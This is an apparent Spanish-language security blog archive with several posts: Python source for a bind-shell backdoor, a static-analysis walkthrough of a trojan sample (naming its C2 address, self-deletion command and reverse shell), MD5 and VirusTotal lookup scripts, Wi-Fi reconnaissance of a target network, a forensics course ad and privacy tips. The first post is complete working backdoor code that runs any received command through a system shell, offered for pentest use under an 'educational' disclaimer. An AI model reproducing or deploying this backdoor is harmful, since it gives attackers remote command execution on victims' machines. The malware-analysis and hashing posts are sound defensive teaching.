Tag Archive seguridad informatica

BySin Rostro

Creando un backdoor en python

Vamos a crear un backdoor en python馃槇馃槇馃槇馃槇馃槇馃槇馃槇馃槇馃槇, para que nos ayude en nuestras pruebas de pentest, nos servira cuando no podamos hacer uso de otros metodos de backdoring.

 

Este backdoor es de Conexion Directa. Trate de dejarlo lo mas comentado posible Saludos Hackers.

import sys, os
import socket
import getopt
import threading
import subprocess

# Definimos algunas variables globales
listen             = False
command            = False
target             = ""
port               = 0

# Vamos a definir una funcion que nos provea 
# de ayuda
def usage():
    print "\n\tTroyano de Conexion Directa"
    print 
    print "Uso: backdoor.py -t target_host -p port"
    print "-l --listen                       escuchar en [host]:[port]"
    print "-s --shell                      inicializa una shell"
    print
    print
    print "Ejemplos: "
    print "python backdoor.py -t 192.168.1.1 -p 5555 -l -s"
    print "\tPara dejar en escucha una shell"
    print "python backdoor.py -t 192.168.1.1 -p 5555"
    print "\tPara conectarse a una shell"
    print "\nSimple Backdoor de Conexion Directa para los"
    print "Miembros de la Comunidad de Hacking Publico & Sistemas Informaticos"
    print "el Creador de este codigo o cualquier Miembro de Hacking Publico"
    print "NO se hacen responsables por el uso que le puedan dar a este codigo,"
    print "el cual esta hecho con fines Educativos."
    sys.exit(0)

# Funcion que se encargara de el cliente
# osea la computadora que se conecta al 
# backdoor 
def client_sender():
    # Creamos el socket
    cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        # Hacemos la conexion al servidor/backdoor
        cliente.connect((target, port))
        # Aqui solo te pregunto tu nickname
        nickname = raw_input("Cual es tu nickname ? ")
        # Lo concateno (Tu nick) con otra cadena
        nickname += "@hacker ~:#"
        # Envio un whoami (Para que sepamos que 
        # usuario somos en el equipo comprometido)
        cliente.send("whoami")
        # Recibimos el usuario
        usuario = cliente.recv(1024)
        # Y lo imprimimos
        print "Eres el usuario: \t%s" % usuario
        
        while True:
            # Esperamos por mas input           
            buff = raw_input("%s " % nickname)
            
            # Enviamos comando
            cliente.send(buff)
            # El data es la respuesta del comando 
            # que Enviamos
            data      = cliente.recv(1024)

            print data
            
            # Si el comando es "exit"
            # nos desconectamos del servidor/backdoor
            # si es limpiar pantalla 
            # la limpiamos 
            try:
                if "exit" in buff:
                    cliente.send("exit")
                    cliente.close()
                    print "Bye, Bye!!!"
                    break     
                if "cls" or "clear" in buff:
                    if os.name('nt'):
                        os.system("cls")
                    else:
                        os.system("clear")
            except:
                continue
                        
    except:
        # Si hubo un error se produce una Excepcion
        # y salimos del script
        print "[*] Excepcion! Saliendo!!!"
        cliente.close()
        
def server_loop():
    global target
    
    # Si no indicamos la opcion -t
    # el server toma esta direccion
    if not len(target):
        target = "0.0.0.0"
    
    # Creamos el socket para las conexiones 
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    
    # Creamos un hilo por cada cliente que se conecte
    try:
        while True:
            client_socket, addr = server.accept()
            
            client_thread = threading.Thread(target=client_handler,
                                             args=(client_socket,))
            print "[*] Nuevo cliente conectado %s" % socket.gethostname()
            client_thread.start()
            
    except KeyboardInterrupt:
        print "Se ha detenido el server"
        sys.exit(1)        
        
        
def run_command(command):

    command = command.rstrip()

    
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, 
                                         shell=True)
    except:
        output = "Fallo al ejecutar el comando.\r\n"
 
    return output

def client_handler(client_socket):
    global command
     
    if command:
        while True:
            

            cmd_buff = client_socket.recv(1024)

            if "exit" in cmd_buff:
                print "El cliente %s se DESCONECTO." % socket.gethostname()
                client_socket.close()
                break                    
            
            response = run_command(cmd_buff)
            
            client_socket.send(response)
            
def main():
    global listen
    global port
    global command
    global target
    
    # aqui verificamos que el usuario haya
    # dado opciones, si no, imprime el modo
    # de uso (funcion usage() )
    if not len(sys.argv[1:]):
        usage()
    
    # Si el usuario dio opciones las leemos 
    # para verificar que sean validas, despues 
    # ejecutar lo correspondiente
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hlt:p:s", ["help", "listen", "target",
                                                             "port", "shell"])
    except getopt.GetoptError as err:
        print str(err)
        usage()
    
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-s", "--shell"):
            command = True
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)     
        else:
            assert False, "Opcion no valida"
            
    if not listen and len(target) and port > 0:
        client_sender()
    if listen:
        server_loop()

main()

 

BySin Rostro

Reversing en Malware 3 – An谩lisis est谩tico

Bueno, bueno, ya por fin comenzaremos con la practica, no es que no quiera pasar de lleno a ella, si no que quiero que queden claros algunos recursos que usaremos. Adem谩s podemos aprender m谩s cosas as铆聽馃.

Sin han llegado hasta aqu铆 sin haber le铆do mis 2 anteriores post les recomiendo ir r谩pidamente all谩 y leerlas porque est谩n geniales aqu铆 tienes el Primer Post y ac谩 tienes el Segundo Post.

An谩lisis Est谩tico

Ok, lo primero que har茅 ser谩 dejar una serie de cosas que debemos (aunque sea una hip贸tesis) obtener con este an谩lisis. Est谩n en el orden en que yo las har铆a. As铆 que si encuentras la ultima o la 3ra no importa pero si deber铆amos tener la mayor铆a si no es que todas 馃槈.

1.- Informaci贸n del archivo (tipo de archivo, cabeceras, tama帽o, etc)
2.- Hashing y an谩lisis con VirusTotal
3.- PE Informaci贸n (DLLs, Librer铆as, etc)
4.- Recolecci贸n de Strings
5.- Ejecuci贸n del archivo
6.- Captura Trafico de Red
7.- 驴驴Como ha llegado ah铆??

Ya hab铆a pasado el link del primer archivo con el que trabajaremos pero por si acaso no lo has descargado aqu铆 esta de nuevo recuerden que la contrase帽a es “hpsi”.

1.- Informaci贸n del archivo

Ya lo he descargado y comenzare abriendo el archivo desconocido (a煤n) con un editor hexadecimal estoy usando HxD – Hexeditor. Y esto es lo que veo cuando le cargo el archivo desconocido.

Como se pueden dar cuenta la cabecera del archivo me dice MZ, si eres de los que alguna vez a realizado wargames de esteganograf铆a sabr谩n casi inmediatamente de que tipo de archivo se trata si no, les dejo una lista del inicio las cabeceras de algunos archivos.

.PNG聽 聽 聽 聽 聽 聽 聽聽聽聽聽聽聽聽 PNG聽 聽|END
.GIF聽 聽 聽 聽 聽 聽 聽聽聽聽聽聽聽聽聽聽 GIF聽 聽|END
.JPG/JPEG聽 聽 聽聽聽聽 每脴每脿聽 聽每脵
.BMP聽 聽 聽 聽 聽 聽 聽聽聽聽聽聽聽 BM
.EXE聽 聽 聽 聽 聽 聽 聽 聽 聽 聽聽 Mz
.MP3聽 聽 聽 聽 聽 聽聽聽聽聽聽聽聽聽 ID3
.RAR聽 聽 聽 聽 聽 聽 聽聽聽聽聽聽聽 Rar
.ZIP聽 聽 聽 聽 聽 聽 聽聽聽聽聽聽聽聽聽 Pk
.PDF聽 聽 聽 聽 聽 聽聽聽聽聽聽聽聽聽 %PDF

Bueno con esto podemos decir que el tipo de archivo es un .EXE, un ejecutable del OS win2, as铆 que podemos agregarle la extensi贸n a ese archivo el cual se vera as铆.

2.- Hashing y an谩lisis en VT

Bien ahora quisiera pasarlo al script de python que creamos en el post anterior y ver que resultados nos arroja.

Baya si que es un chico peligroso, como pueden ver de los 63 tests, 59 fueron True osea que fue amenaza positiva y la mayor铆a me dice que es un troyano/backdoor as铆 que ya podemos ir imaginando que es lo que este chico hace.

3.- PE informaci贸n

Ok, veamos que nos devuelve la informaci贸n del PE en este caso usare dos herramientas para que vean que esta cosa del an谩lisis es muy vers谩til 馃槀馃槀.

La primera es PEview veamos que es lo que esta importando.

Ok en este programa esta haciendo 5 importaciones veamos en el segundo que nos devuelve.

EL programa se llama CFF explorer.

Bueno al parecer no hay problema en eso ya que nos devuelve los mismos resultados ustedes eligen 馃榿馃榿

Ok, Ok, 驴驴Bueno pero para que me sirve saber esto de las importaciones?? se estar谩n preguntando. La respuesta es sencilla, para saber que es lo que planea hacer el archivo.exe.

Por ejemplo la DLL 5 osea la WS2_32.dll le permite al .exe configurar conexiones de red ya que esta DLL configura sockets como lo podemos leer aqu铆.

4.- Strings

Muy bien hagamos una recopilaci贸n de informaci贸n que tenemos hasta ahora:

El archivo desconocido ya no lo es m谩s, ya que identificamos que era un .EXE,

sabemos que la mayor铆a de los antivirus lo reconocen como troyano/backdoor,

que importa 5 DLLs y que una de ellas es usada para crear o configurar conexiones de red,

vaya, si que parece un troyano 馃槇馃槇.

Ahora deber铆amos tratar de averiguar a donde es que hace esa conexi贸n, si es que la hace.

Con la obtenci贸n de strings podr铆amos averiguar eso y otras cosas m谩s.

Un ejemplo, si el archivo manda un mensaje al ser ejecutado…, podr铆amos saber que es lo que este dice o si crea una carpeta o ingresa a una ruta cual es el nombre de estas, etc, etc. El problema aqu铆 como en cualquier caso de Ingenier铆a Reversa claro, ser谩 la cantidad de strings que se puedan obtener ya que esta puede ser extremadamente grande y en ocasiones nos puede confundir en lugar de ayudarnos.

Vamos pues a ello, utilizare esta vez la herramienta llamada Bin Text pero de nuevo ustedes pueden usar la que crean conveniente. Esto es lo que me arroja.

Esas 4 llaman mi atenci贸n (Bueno hay mas pero por ahora no lo mencionare 馃槈).

  1. http://www.ueopen.com/test.html
  2. cmd.exe
  3. /c del
  4. 60.248.52.95:443

Algunas de las otras me dan una idea de como es que trabaja pero estas 4 son muy llamativas al ojo, 驴No creen?

Bueno ya con estas cadenas de texto podr铆amos suponer que hace 2 conexiones una a la URL y otra a la direcci贸n IP y que probablemente borre nuestro disco duro 馃槺馃槺馃槺馃槺 jajaja no, no, bromeo cmd /c indica un comando en este caso del., el cual s铆 quiere decir borrar (delete) pero aun no se que exactamente, 驴驴tal vez la siguiente linea que esta abajo de ese string??

Bueno mientras son peras o son manzanas pasemos al siguiente punto.

5.- Ejecuci贸n del archivo

Nota importante:.

Estoy trabajando en Virtual Environment (Entorno virtual) osea que si se me jode el sistema, tengo la posibilidad de recuperarlo, siempre y cuando tenga configurado un snapshot.

Espero no me juzguen por mi paradoja de lo virtual que intento explicar con la imagen 馃槄馃槀馃槬.

Bien explicando un poco mejor, estoy virtualizando un sistema Win2, dentro de ese sistema operativo win2 he creado un punto en donde he preservado el estado actual de la m谩quina, sus dispositivos, documentos, configuraciones, etc. Por supuesto, puedes crear snapshots dentro de los snapshots, por eso dec铆a eso de las paradojas, por que es como si crearas 2 o 3 o mas realidades que afectan a ese sistema operativo win2. Una imagen vale m谩s que 1000 palabras.

Puedes regresar a cualquier estado al cual le tengas hecho un snapshot, claro siempre y cuando no est茅 da帽ado 馃槀.

Bueno continuando con lo que nos interesa es momento de correr nuestro debian 64 bits y corroborar que existe conexi贸n entre las dos m谩quinas.

Muy bien tengo conexi贸n de win2 a Debian, ahora har茅 un snapshot de este punto antes de ejecutar el archivo.

Mientras tanto en Debian tengo corriendo wireshark y veo que a capturado el ping que he realizado, confirm谩ndome que efectivamente hay conexi贸n entre las m谩quinas.

Muy bien corro el archivo y esto es lo que sucede.

Obtenemos las capturas de estos paquetes, he se帽alado 3 cosas., de izquierda a derecha,

tenemos la direcci贸n IP del Win2,

la direcci贸n IP a la que el malware intenta hacer la conexi贸n,

el Puerto Local que ha usado el malware en Win2

y por ultimo el puerto Remoto de la direcci贸n IP posible del C&C.

He realizado la misma captura pero desde el mismo Win2 y obviamente son los mismo resultados.

Noten que el archivo mientras era ejecutado y hacia las debidas conexiones sigue estando en el escritorio pero una vez terminada esas tareas ha desaparecido, bueno en realidad ha sido eliminado por el mismo.

Resumiendo,

podemos decir que con la ayuda PEview obtuvimos la muy posible fecha de compilaci贸n del archivo, no podemos afirmar con toda certeza pero al menos tenemos una fecha estimada.

Ok veamos.

- fecha: 2009/05/14
- Lenguaje: Microsoft Visual C++ 6.0
- Strings encontradas(Ahora si a帽adir茅 una m谩s):
   - 60.248.52.95:443 # Host y puerto al que conecta
   - http://www.ueopen.com/test.html # ?? Probablemente url de test para conexion ???
   - cmd.exe # Referencia hacia la consola de windows 
   - /c del  # Comando para su auto-eliminaci贸n (delete itself  "cmd.exe /c $PATH > null")
   - *(SY)#  # Usado posiblemente para generar una Shell remota
- Despues de correr el archivo:
   - conecta a 60.248.52.95
   - genera una Shell inversa
   - y se auto elimina
- Con la informaci贸n que hemos recolectado no podr铆amos decir como ha llegado
  ese archivo a la computadora, quiero decir, si ha sido enviado por medio 
  de phishing, un downloader lo a descargado, venia empaquetado con otra app,
  o de plano nos lo hemos bajado nosotros tratando de encontrar el crack para
  plant Vs zombies o alguna otra herramienta de softonic... 
  

Y podemos decir que nuestras hip贸tesis acerca de lo que este archivo realizaba estaban bien fundadas, bueno eso y adem谩s que el an谩lisis con virustotal tambi茅n nos dijo eso 馃槀馃槀馃槀.

Bueno hasta aqu铆 creo que es un buen inicio en an谩lisis est谩tico hay muchas cosas mas que afrontar en este tipo de an谩lisis pero como dije es una introducci贸n ya iremos adentrando m谩s en ello.

Saludos Hackers y hasta la pr贸xima.

BySin Rostro

Reversing en Malware 2 – Hashing.

Un hash es un algoritmo matem谩tico que es generado/creado a partir de una entrada como un texto, una contrase帽a o un archivo. Pero hoy lo usaremos en an谩lisis de malware 馃槇.

驴NOS SIRVE EN AN脕LISIS DE MALWARE?

La respuesta es si.

Los hash son generados tomando bloques de datos arbitrarios y devolviendo una serie de caracteres con una longitud especifica. Es decir que a partir de los datos de entrada se genera la cadena que solo puede volverse a generar con esos mismos datos. Bueno en teor铆a eso debe de pasar pero en algunos casos como el de SHA1 que en meses anteriores ha sido colisionado por Investigadores de Google.

Aun as铆 existen muchos m谩s algoritmos. En nuestro caso vamos a estar utilizando MD5. 驴Pero? que es exactamente y como es que funciona.

Ya saben que no me gusta atiborrarlos de informaci贸n adem谩s de que no estamos en un curso de cifrado 馃槅, as铆 que tratare de explicarles en practica.

Imagina que estas descargando un archivo “juego.exe”, en la p谩gina del desarrollador menciona que el MD5 es:

8033E2DDE927771A125F26A158C282A3

Pero al descargarlo te das cuenta de que el MD5 que generas tu con ese mismo archivo es:

5F778048775E0ECE6DBB97B6997019B2

Claramente no es igual lo que nos da a pensar de acuerdo a la introducci贸n de m谩s arriba, que el archivo tiene bloques de datos diferentes al archivo que han desarrollado los creadores, con esto podr铆amos concordar en que este archivo puede contener c贸digo que bien podr铆a o no, ser malicioso 馃槇馃槇.

Pasemos a la practica 馃槈

Tengo aqu铆 un archivo.

Utilizare una utilidad llamada “QuickHash”

Despu茅s de abrir el archivo con la utilidad y elegir MD5 nos genera la cadena correspondiente a ese archivo

Y as铆 de sencillo podr铆amos obtener el MD5 de los archivos. Bien con eso ya sabemos una manera de obtener MD5, pero para que nos sirve el MD5 en an谩lisis de malware?

Bueno imagina que este archivo es un sample que tienes que analizar, para no subir el archivo completo a un motor de b煤squeda que te ayude a saber si es o no una amenaza (ya sabes puede pesar mucho y aveces nuestras datas no alcanzan 馃槀), bueno pues con el MD5 podemos averiguar lo que queremos.

Para ello usaremos un sitio bastante conocido virusTotal y con el MD5 obtenido veremos los resultados que nos arroja.

Quiero que vean algo, el primer par谩metro, el que esta arriba del nombre del archivo dice:

SHA256: 46532f3def025aca4da1fa5646f5d19fafb2ec00e3b262ad87712ec6756902f9

Este es un tipo de hash yo ingrese el MD5 no el SHA256. Lo que sucede es que ese motor de b煤squeda calcula adem谩s del MD5 otros datos para que se tenga total certeza de que hablamos del mismo:

Y ahora mi parte Favorita 馃槏

Hazlo con python 馃榿

He desarrollado un peque帽o script en python que nos calcula el MD5 del archivo.

# Script en python para calcular Hash MD5
# Analizar Samples
# Desarrollado por Eric Alberto Mart铆nez
# Hacking Publico & sistemas inform谩ticos
# AguasHack - No Hacking No Fun
# Versi贸n 1.0
''' Este script permite calcular el Hash MD5 de archivos
  
    el c贸digo puede ser manipulado y/o copiado manteniendo las 
    11 primeras lineas de c贸digo.
''' 

# Importar librer铆as
import hashlib

# Acontinuaci贸n creamos una funci贸n
# que nos permitira abrir un archivo leer
# sus datos y generar su Hash MD5
 
def calcularMd5(archivo):
  archivo = open(archivo, 'rb')
  print "\nEl MD5 es: " + hashlib.md5(archivo.read()).hexdigest()
  archivo.close()

print "Hola, Ingresa la ruta del archivo"
archivo = raw_input("\n::> ")
calcularMd5(archivo)

Y., uno m谩s un poco mejor elaborado, con este script interactuamos con el sitio de Virus Total para obtener los resultados del sitio. El script aun esta en desarrollo le quiero dar un poco m谩s de formato, teniendo en cuenta que lo acaba de crear creo que es funcional y para nuestras pruebas durante las pr贸ximas entradas sera suficiente.

Como puedes ver son los mismos resultados que nos genero en la web de virustotal

– Nota:聽 Trate de dejarlo lo m谩s simple posible le a帽ad铆 comentarios a casi todo el c贸digo para que sea un poco m谩s f谩cil de entender.

# Analizar Samples 
# Api VirusTotal
# Desarrollado por Eric Alberto Martinez
# Hacking Publico & sistemas informaticos
# AguasHack - No Hacking No Fun
# Version 1.0
''' Este script permite calcular el Hash MD5 de archivos
    y manipular los resultados obtenidos en Virus Total,
    el codigo puede ser manipulado y/o copiado manteniendo las 
    11 primeras lineas de codigo.
''' 
# Importamos librerias

import requests
import hashlib

# Tu llave API de virus Total (Tienes que registrarte)
apiKey = ''
    
# clase para obtener datos o subir archivos
class virusApi:
    

    # Funcion para escanear un archivo
    def escanear(self, apiKey, archivo):
        print "Analisando el archivo...\n"
        # Configuramos la APIKEY
        params = {'apikey': apiKey}
        # Abrimos el archivo en modo binario                                    
        files = {'file': (archivo, open(archivo, 'rb'))} 
        # Hacemos la peticion al sitio              
        response = requests.post('https://www.virustotal.com/vtapi/v2/file/scan', 
                                files=files, params=params)
        # obtenemos la respuesta del sitio
        json_response = response.json()                                 
    
    # Funcion para Re-escanear
    def rescanear(self, apiKey, md5):
        # confirguramos la APIKEY y el hashMD5
        params = {'apikey': apiKey, 
                'resource': md5}                                        
        # Hacemos la peticion al sitio
        response = requests.post('https://www.virustotal.com/vtapi/v2/file/rescan',
                                params=params)
        # Obtenemos la Respuesta del sitio                          
        json_response = response.json()                                 
    
    # Funcion para Obtener los resultados de un analisis
    def obtenerResultados(self, apiKey, md5):
        print "Obteniendo Resultados...\n"
        # Configuramos la APIKEY y el HashMD5
        params = {'apikey': apiKey, 
                'resource': md5} 
        # Creamos las cabeceras                                     
        headers = {
          "Accept-Encoding": "gzip, deflate",
          "User-Agent" : "gzip,  Mi Aplicacion python para VirusTotal"
          }     
        # hacemos la peticion al sitio                                                      
        response = requests.get('https://www.virustotal.com/vtapi/v2/file/report',
                                params=params, headers=headers)
        # obtenemos la respuesta del sitio      
        json_response = response.json() 
        # obtenemos solo las claves de la respuesta                             
        claves = json_response.keys()   
        # declare una variable                              
        x = 'scans'     
        # ciclo para obtener los primeros resultados excepto los de la deteccion                                                 
        for clave, valor in json_response.items():  
            # si la clave no es igual a 'scans'                 
            if clave != x:
                # imprimimos los primeros resultados                                                
                print clave, ':\t\t', valor
        # declaramos una lista                          
        lista = []
        # ciclo para obtener las claves del segundo resultado                                                       
        for i in json_response['scans'].keys(): 
            # agrega cada clave a la lista                              
            lista.append(i) 
            # Reasignamos la variable                                           
            j = json_response
            # Variable que contiene si el archivo es detectado o no p/c antivirus                                           
            detectado = str(j['scans'][i]['detected'])
            # Variable que contiene el tipo de amenaza que es detectada p/c antivirus                  
            resultado = str(j['scans'][i]['result'])
            # imprimimos el resultado                   
            print i + "\t\t" + detectado + "\t\t" + resultado           

# Instanciamos la clase
virusTotal = virusApi()                                                 
'''
Creo que apartir de aqui el codigo no necesita explicacion
ya que son cosas basicas que son faciles de entender, aun 
asi si existen dudas no duden en comentar en el grupo de
Hacking Publico & sistemas informaticos
'''
print "\nHola, Bienvenido\nQue deseas hacer?"
print '''
[1] Escanear
[2] Re Escanear
[3] Obtener resultados
'''
eleccion = raw_input("\n::> ")
if eleccion == '1':
    archivo = raw_input("\nIngresa la ruta del archivo \n::> ")
    virusTotal.escanear(apiKey, archivo)                                
    archivo = open(archivo, 'rb')
    # Calculamos el MD5 del archivo                                     
    md5 = hashlib.md5(archivo.read()).hexdigest()                       
    archivo.close()
    print "El hashMD5 del archivo es: " + md5
    virusTotal.obtenerResultados(apiKey, md5)
elif eleccion == '2':
    archivo = raw_input("\nIngresa la ruta del archivo \n::> ")
    archivo = open(archivo, 'rb')
    # Calculamos el MD5 del archivo
    md5 = hashlib.md5(archivo.read()).hexdigest()
    archivo.close()
    print "El hashMD5 del archivo es: " + md5
    virusTotal.rescanear(apiKey, md5)
    virusTotal.obtenerResultados(apiKey, md5)
else:
    archivo = raw_input("\nIngresa la ruta del archivo \n::> ")
    archivo = open(archivo, 'rb')
    # Calculamos el MD5 del archivo
    md5 = hashlib.md5(archivo.read()).hexdigest()
    archivo.close()
    print "El hashMD5 del archivo es: " + md5
    virusTotal.obtenerResultados(apiKey, md5)

Bueno hasta aqu铆 esta entrada creo que lo han tomado bien,聽馃槄馃槄 nos leemos en la pr贸xima entrada.

Saludos Hackers!

BySin Rostro

Intro a Python 2

Bueno pues esta vez les traigo la segunda parte de la introducci贸n a python, hablamos acerca de Scapy y lo poderoso que puede llegar a ser si se aprende a usar de forma correcta y de como es posible remplazar con este muchas de las herramientas de red que existen y por ultimo les muestro lo que se puede llegar a realizar con un script de python }:)

Movi茅ndonos con Scapy

BySin Rostro

Intro a python

Hablamos sobre el interprete y las caracter铆sticas b谩sicas de python, como los tipos de datos, como trabajar con listas, funciones, ciclos, estructuras de control y todo lo b谩sico que debes de saber聽 para poder adentrarse a este maravilloso lenguaje. Ven acompa帽anos a este maravilloso viaje.

Introducci贸n a Python

ByMoritz

Simulador 2 | Seguridad inform谩tica nivel avanzado

Si resuelves este simulador a la primera eres un puto Hacker! de los 茅picos.

REQUIERE FLASH


Hacer Donaci贸n
A quien debemos el apoyo



ByDrok3r

ACRYLIC WiFi | An谩lisis de redes WiFi [Information Gathering Tool]

Cuando realizamos un pentesting, debemos iniciar con la fase de recopilaci贸n de informaci贸n sobre nuestro objetivo, para eso debemos de contar un “arsenal” de herramientas, con las cuales poder recopilar informaci贸n.

Tener mas de una herramienta u opci贸n para realizar esta tarea. Por ejemplo en el post de聽Pentesting de redes WiFi | Fase de recolecci贸n de informaci贸n聽utilice dos herramientas para recopilar informaci贸n sobre nuestra red objetivo. NetSpot聽y WiGLE聽las cuales aparte de ayudarme a recopilar informaci贸n sobre la red objetivo, pude encontrar mas informaci贸n, pues hacer mas de un escaneo de nuestro objetivo, y con distintas herramientas es muy recomendable.

Ahora hablare de otra herramienta que a mi parecer es muy buena pero tiene un inconveniente para los usuarios que creen en que todo es gratuito, pues esta herramienta es paga, aunque tiene su versi贸n gratuita no es igual que la versi贸n paga, pero de podemos probar la versi贸n pro por unos d铆as.

ACRYLIC WiFi聽es una herramienta que nos permite administrar las redes hasta realizar tareas de seguridad.

Incluso nos permite realizar escaneos de cobertura de una red WiFi, identificar contrase帽as por defecto tanto WEP, WAP o WPS entre una gran cantidad mas de funciones.

Esta herramientas nos facilita tanto el trabajo, que incluso tiene su propio blog (ACRYLIC WiFi Blog) en donde podemos encontrar temas desde la administracion de una red, la cobertura que esta tiene y algo que nos puede interesar, que es la seguridad.

Entre tantas de las utilidades que tiene esta herramienta, nos enfocaremos en lo que necesitamos, recopilar informaci贸n de nuestra red objetivo para las prubas de intrusi贸n.

Apenas iniciamos esta herramienta inmediatamente realiza un escaneo de las redes que tenemos a nuestro alcance, incluyendo nuestra red objetivo.

En la parte superior tenemos un panel en donde se muestran las redes detectadas e informaci贸n de cada una de ellas en una tabla. Mientras que en la parte inferior tenemos otro panel gr谩fico en donde tenemos mas informaci贸n de la red WiFi, espec铆ficamente informaci贸n sobre la se帽al, desde la calidad hasta la conectividad.

Nosotros nos enfocaremos en nuestra red objetivo (c934a2) y la informaci贸n que esta herramienta nos ofrece, Recordando la informaci贸n que ya hab铆amos recopilado en la primera fase del pentesting, veremos si tenemos nueva informaci贸n.

  • SSID
    • c934a2
  • BSSID
    • 60:02:92:E6:IF:14
  • Canal
    • 1 – 2.4 GHz
  • RSSI.
    • -30dBm – 50dBm
  • Tipo de Red.
    • Hogare帽a –
  • Seguridad.
    • WPA2-PERSONAL
  • Vendedor – Fabricante
    • PEGATRON – CISCO
  • Encriptaci贸n
    • WPA-PSK-CCMP-TKIP
  • WiFi Protected Setup
    • ACTIVO
  • ISP – Proveedor de Servicios de Internet (por comprobar)
    • Megacable M茅xico
  • Router (por comprobar)
    • Cisco DCP3925

En el panel inferior en la secci贸n Detailed info tenemos mas informaci贸n de una red seleccionada.

Ahora tenemos mucha mas informaci贸n, que al inicio. Este es un ejemplo de como realizar mas de un escaneo con distintas herramientas nos puede ser de utilidad, ya que podemos encontrar algo que el primer escaneo nos arrojo.

Acrilyc tambi茅n nos permite visualizar los paquetes en hexadecimal y aplicar filtros.

Por otra parte, podemos exportar los resultados del escaneo de nuestra red objetivo, a archivos .txt, .html y .csv. La facilidad de poder exportar la informaci贸n de nuestra red objetivo,

Con este reporte podemos analizar con mas tranquilidad la informaci贸n de nuestra red objetivo. Por ejemplo dentro de nuestro informe nos indican que tenemos un problema de saturaci贸n de se帽ales WiFi en el canal 1, que es cierto, ya que si vemos las redes que est谩n activas mas de 1 utilizan este canal.

Lo recomendable es no quedarse con un solo scanner, sino ir buscando mas y mejores que se puedan adaptar a nuestras necesidades.

ByRodrigo Palou

APRENDE C脫MPUTO FORENSE

curso online C贸mputo Forense

Para aquellos que est茅n interesados aun hay lugares para matricular al curso de Inform谩tica Forense, el curso es totalmente en l铆nea las sesiones son totalmente personalizadas (participante-instructor)

驴Qu茅 es el c贸mputo forense?

El c贸mputo forense es la aplicaci贸n de t茅cnicas cientifico-anal铆ticas a infraestructura tecnol贸gica la cual se usa para identificar, preservar, recuperar y analizar evidencia digital que sea v谩lida en un procedimiento legal.

驴A quien v谩 dirigido el curso?

Profesionales en tecnolog铆a de la informaci贸n, miembros de equipos de respuesta a incidentes, administradores de seguridad de la informaci贸n, abogados, ingenieros de sistemas, analistas forenses,聽 y cualquier interesado en investigaciones de computo forense y seguridad inform谩tica.

驴Qu茅 temas se abordan en el curso?

+ Introducci贸n al c贸mputo forense

+ El disco duro

+ Preservaci贸n de evidencias

+ Im谩gen forense en Windows

+ Im谩gen forense en Linux

+ An谩lisis de im谩genes forenses

+ An谩lisis de archivos de paginaci贸n

+ An谩lisis del registro de Windows

+ Memoria vol谩til

+ Forense a cuentas de skype (mediante archivos de sistema)

+ Recuperaci贸n de dispositivos USB conectados a un equipo

+ Esteganograf铆a

+ Datacarving (Windows y Linux)

+ Forense a historiales de navegaci贸n web

+ Forense a la memoria cache

+ Extraccion y an谩lisis de metadatos (geoposicionamiento fotogr谩fico)

+ Forense a archivos Thumbs.db

+ Linux Forensics (incluye android)

+ Forense a la $MFT

+ Adquisicion de archivos bloqueados para an谩lisis de sistemas vivos

+ Miner铆a de datos

Contacto

https://facebookbrand.com/wp-content/themes/fb-branding/prj-fb-branding/assets/images/fb-art.pngComputec Consultoria

+ 52 1 27 405 70 65


 

 

 

ByDrok3r

Protecci贸n de datos | Navegaci贸n An贸nima

En la mayor铆a de mis publicaciones trato de hacer un 茅nfasis, en el tema de la protecci贸n de datos y del anonimato. Con forme los usuarios navegan en Internet, van dejando una gran cantidad de datos, sin darse cuenta. Mientras que otros usuarios conocedores del tema, pueden llegar a ser paranoicos, buscando distintos m茅todos para proteger su informaci贸n y el contenido que van visitando, hasta cierto punto buscan el anonimato.

La IP, las coockies, los ISP, ciertos programas o aplicaciones que analizan nuestro historial, y demas no nos dejan conocer el anonimato, aunque los navegadores implementen el聽modo inc贸gnito 聽no se garantiza la privacidad de nuestros datos.

Estos son algunos consejos que se pueden tomar, para mejorar hasta cierto punto la privacidad y seguridad de nuestra informaci贸n:

HTTPS

Nunca sabr谩s quien esta en la misma red que tu, utilizando un Sniffer, capturando todo tu trafico de red, espiando tus actividades. Visitar paginas que manejen el protocolo HTTPS nos ayuda a proteger nuestros datos incluso de una gran variedad de amenazas.

BLOQUEADORES DE ANUNCIOS

La publicidad en internet, aparte de ser molesta, representa un riesgo para la seguridad de nuestra informaci贸n, ya que la mayor铆a de los anuncios existen con fines maliciosos.

1

Existen diferentes tipos de bloqueadores de anuncios los cuales est谩n disponibles para su descarga gratuita o compra. Por otro lado, en los smartphone, existen una gran variedad de navegadores que ya tienen incluida, la opci贸n de bloquear anuncios.

Los bloqueadores que recomiendo, personalmente son聽Adblock Plus聽y聽APUS Browser聽(APUS es para smartphone).

“Un gran n煤mero de sitios usan cookies para rastrear y recopilar los h谩bitos de navegaci贸n de los usuarios que los visitan, pero los bloqueadores de anuncios impiden que se guarden dichos datos.” – ESET

CORREO ELECTR脫NICO TEMPORAL

En algunos casos, necesitamos cierta informaci贸n, la cual esta disponible en algunas paginas o blogs, pero para poder acceder a ellas tenemos que forzosamente registrarnos o indicar nuestro correo electr贸nico, con el fin de mandarnos mas publicidad, sobre la pagina o blog. Hasta cierto punto esto puede resultar incomodo, el tener que estar viendo en nuestro correo personal basura, que posiblemente no nos interesa.

Utilizando correos electr贸nicos, temporales, podemos evitar o reducir la cantidad de Spam o Phishing que pueda llegar a nuestro correo personal que comprometa nuestra informaci贸n.

Para poder evadir esto podemos implementar, correos electr贸nicos temporales.

Peque帽a lista de correos electronicos temporales:

VPN, TOR Y MAS SOFTWARE

Utilizar VPNs (Redes Virtuales Privadas) nos permiten proteger de manera eficaz, 聽nuestra privacidad, pues ocultan nuestra direcci贸n IP y nuestro trafico de red viaje por un t煤nel cifrado, seguro con lo cual podemos incluso ocultar el nuestro pa铆s de origen para los sitios que visitamos.

Tor es una red que nos permite maximizar nuestro anonimato. Pues pasamos por una gran cantidad de servidores, escondiendo nuestra IP.

